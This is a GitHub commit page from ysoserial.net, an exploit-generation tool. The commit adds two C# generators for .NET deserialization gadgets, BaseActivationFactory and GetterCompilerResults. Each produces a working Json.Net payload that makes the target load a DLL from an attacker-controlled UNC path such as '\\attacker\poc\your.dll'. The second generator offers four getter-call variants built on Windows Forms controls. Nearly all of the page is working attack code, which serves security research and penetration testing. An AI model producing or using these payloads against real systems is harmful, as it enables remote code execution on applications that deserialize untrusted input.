Skip to content

Commit

Permalink
Merge pull request #156 from chudyPB/post-hexacon
Browse files Browse the repository at this point in the history 
Post hexacon - refer to #156 (comment) to see the changes
  • Loading branch information
@irsdl
irsdl authored Oct 17, 2023
2 parents 22b58d0 + 7b3b61e commit 1dba9c4
Show file tree
Hide file tree
Showing 14 changed files with 2,765 additions and 418 deletions.
925 changes: 512 additions & 413 deletions README.md
View file

Large diffs are not rendered by default.

111 changes: 111 additions & 0 deletions ysoserial/Generators/BaseActivationFactoryGenerator.cs
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,111 @@
using NDesk.Options;
using System;
using System.Collections.Generic;
using System.Collections.Specialized;
using System.Diagnostics;
using System.Linq;
using System.Reflection;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Data;
using ysoserial.Helpers;

namespace ysoserial.Generators
{
public class BaseActivationFactoryGenerator : GenericGenerator
{
// BaseActivationFactory
// Gadget for .NET 5/6/7 with WPF enabled or Microsoft.WindowsDesktop.App\PresentationFramework.dll available
// BaseActivationFactory constructor leads to kernel32!LoadLibraryExW call, one can load remote native DLL (C/C++)
// As an input (-c), you have to provide a path to the DLL (UNC path can be given). ATTENTION - ".dll" string will be appended to your path, you shouldn't provide it

public override List<string> SupportedFormatters()
{
return new List<string> { "Json.Net" }; // MessagePack should work too
}

public override string Name()
{
return "BaseActivationFactory";
}

public override string Finders()
{
return "Piotr Bazydlo";
}

public override string AdditionalInfo()
{
return "Gadget for .NET 5/6/7 with WPF enabled or Microsoft.WindowsDesktop.App\\PresentationFramework.dll available. Leads to remote DLL loading (native C/C++ DLL)";
}

public override List<string> Labels()
{
return new List<string> { GadgetTypes.NotBridgeNotDerived, ".NET 5/6/7", "Requires WPF enabled or PresentationFramework.dll" };
}

public override string SupportedBridgedFormatter()
{
return Formatters.BinaryFormatter;
}

public override object Generate(string formatter, InputArgs inputArgs)
{

String payload;
String targetPath = "";
inputArgs.IsRawCmd = true;

if (!inputArgs.CmdFullString.ToLowerInvariant().EndsWith(".dll"))
{
Console.WriteLine("This gadget loads remote/local file: -c argument should provide a file path to your DLL file\r\nUNC paths can be used for the remote DLL loading, like \\\\attacker\\poc\\your.dll\r\nThis gadget can only load files with DLL extension, as .dll extension will be added to the path during the deserialization\r\nExample: ysoserial.exe -g BaseActivationFactory -f Json.Net -c '\\\\attacker\\poc\\your.dll'");
Environment.Exit(-1);
}

if (formatter.ToLower().Equals("json.net"))
{
inputArgs.CmdType = CommandArgSplitter.CommandType.JSON;

//remove .dll from the targetPath - it will be added by the code during the deserialization
targetPath = inputArgs.CmdFullString;
targetPath = targetPath.Substring(0, targetPath.Length - 4);

payload = @"{
'$type':'WinRT.BaseActivationFactory, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
'typeNamespace':'" + targetPath + @"',
'typeFullName':'whatever'
}
";

if (inputArgs.Minify)
{
if (inputArgs.UseSimpleType)
{
payload = JsonHelper.Minify(payload, new string[] { "mscorlib" }, null);
}
else
{
payload = JsonHelper.Minify(payload, null, null);
}
}

if (inputArgs.Test)
{
try
{
Console.WriteLine("Test not implemented for .NET 5/6/7 gadget. Please test manually on those versions with WPF enabled.");
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
return payload;
}
else
{
throw new Exception("Formatter not supported");
}
}
}
}
170 changes: 170 additions & 0 deletions ysoserial/Generators/GetterCompilerResultsGenerator.cs
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,170 @@
using NDesk.Options;
using Newtonsoft.Json.Linq;
using System;
using System.Collections.Generic;
using System.Runtime.Serialization;
using System.Security.Principal;
using System.Windows.Markup;
using ysoserial.Helpers;

namespace ysoserial.Generators
{
public class GetterCompilerResultsGenerator : GenericGenerator
{
// CompilerResults + Getter call gadget
// CompilerResults.get_CompiledAssembly leads to the DLL Load: remote DLL loading for .NET 5/6/7 and local DLL loading for .NET Framework
// .NET 5/6/7 requires WPF enabled, as getter-call gadgets exist in WPF assemblies
// Mixed DLLs can be loaded

// We can deserialize the CompilerResults with proper member values
// and then call the get_CompiledAssembly with one of the getter-call gadgets:
// PropertyGrid
// ComboBox
// ListBox
// CheckedListBox

// It should be possible to use it with the serializers that are able to call the one-arg constructor

private int variant_number = 1; // Default

public override List<string> SupportedFormatters()
{
return new List<string> { "Json.Net"}; // MessagePack should work too
}

public override string Name()
{
return "GetterCompilerResults";
}

public override string Finders()
{
return "Piotr Bazydlo";
}

public override string AdditionalInfo()
{
return "Remote DLL loading gadget for .NET 5/6/7 with WPF enabled (mixed DLL). Local DLL loading for .NET Framework if System.CodeDom is available. DLL path delivered with -c argument";
}

public override OptionSet Options()
{
OptionSet options = new OptionSet()
{
{"var|variant=", "Variant number. Variant defines a different getter-call gadget. Choices: \r\n1 (default) - PropertyGrid getter-call gadget, " +
"\r\n2 - ComboBox getter-call gadget (may load DLL twice)" +
"\r\n3 - ListBox getter-call gadget" +
"\r\n4 - CheckedListBox getter-call gadget", v => int.TryParse(v, out variant_number) },
};

return options;
}

public override List<string> Labels()
{
return new List<string> { GadgetTypes.GetterChainNotDerived, "Remote DLL loading for .NET 5/6/7 with WPF Enabled, Local DLL loading for .NET Framework if System.CodeDom is available" };
}

public override string SupportedBridgedFormatter()
{
return Formatters.BinaryFormatter;
}

public override object Generate(string formatter, InputArgs inputArgs)
{
String payload;
String compilerPayload;
inputArgs.IsRawCmd = true;

if (!inputArgs.CmdFullString.ToLowerInvariant().EndsWith(".dll"))
{
Console.WriteLine("This gadget loads remote (.NET 5/6/7) or local file (.NET Framework, if System.CodeDom is available): -c argument should provide a file path to your mixed DLL file, which needs to end with the \".dll\"\r\nUNC paths can be used for the remote DLL loading, like \\\\attacker\\poc\\your.dll\r\nIf you want to deliver file with a different extension than .dll, please modify the gadget manually\r\nExample: ysoserial.exe -g GetterCompilerResults -f Json.Net -c '\\\\attacker\\poc\\your.dll'");
Environment.Exit(-1);
}

if (formatter.ToLower().Equals("json.net"))
{
inputArgs.CmdType = CommandArgSplitter.CommandType.JSON;

compilerPayload = @"{
'$type':'System.CodeDom.Compiler.CompilerResults, System.CodeDom, Version=5.0.0.0, Culture=neutral, PublicKeyToken=cc7b13ffcd2ddd51',
'tempFiles':null,
'PathToAssembly':'" + inputArgs.CmdFullString + @"'
}";

if (variant_number == 2)
{
payload = @"{
'$type':'System.Windows.Forms.ComboBox, System.Windows.Forms, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = b77a5c561934e089',
'Items':[
" + compilerPayload + @"
],
'DisplayMember':'CompiledAssembly',
'Text':'whatever'
}";
}
else if (variant_number == 3)
{
payload = @"{
'$type':'System.Windows.Forms.ListBox, System.Windows.Forms, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = b77a5c561934e089',
'Items':[
" + compilerPayload + @"
],
'DisplayMember':'CompiledAssembly',
'Text':'whatever'
}";
}
else if (variant_number == 4)
{
payload = @"{
'$type':'System.Windows.Forms.CheckedListBox, System.Windows.Forms, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = b77a5c561934e089',
'Items':[
" + compilerPayload + @"
],
'DisplayMember':'CompiledAssembly',
'Text':'whatever'
}";
}
else
{
payload = @"{
'$type':'System.Windows.Forms.PropertyGrid, System.Windows.Forms, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = b77a5c561934e089',
'SelectedObjects':[
" + compilerPayload + @"
]
}";
}

if (inputArgs.Minify)
{
if (inputArgs.UseSimpleType)
{
payload = JsonHelper.Minify(payload, new string[] { "mscorlib" }, null);
}
else
{
payload = JsonHelper.Minify(payload, null, null);
}
}

if (inputArgs.Test)
{
try
{
SerializersHelper.JsonNet_deserialize(payload);
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
return payload;
}
else
{
throw new Exception("Formatter not supported");
}
}
}

}
Loading

0 comments on commit 1dba9c4

Please sign in to comment.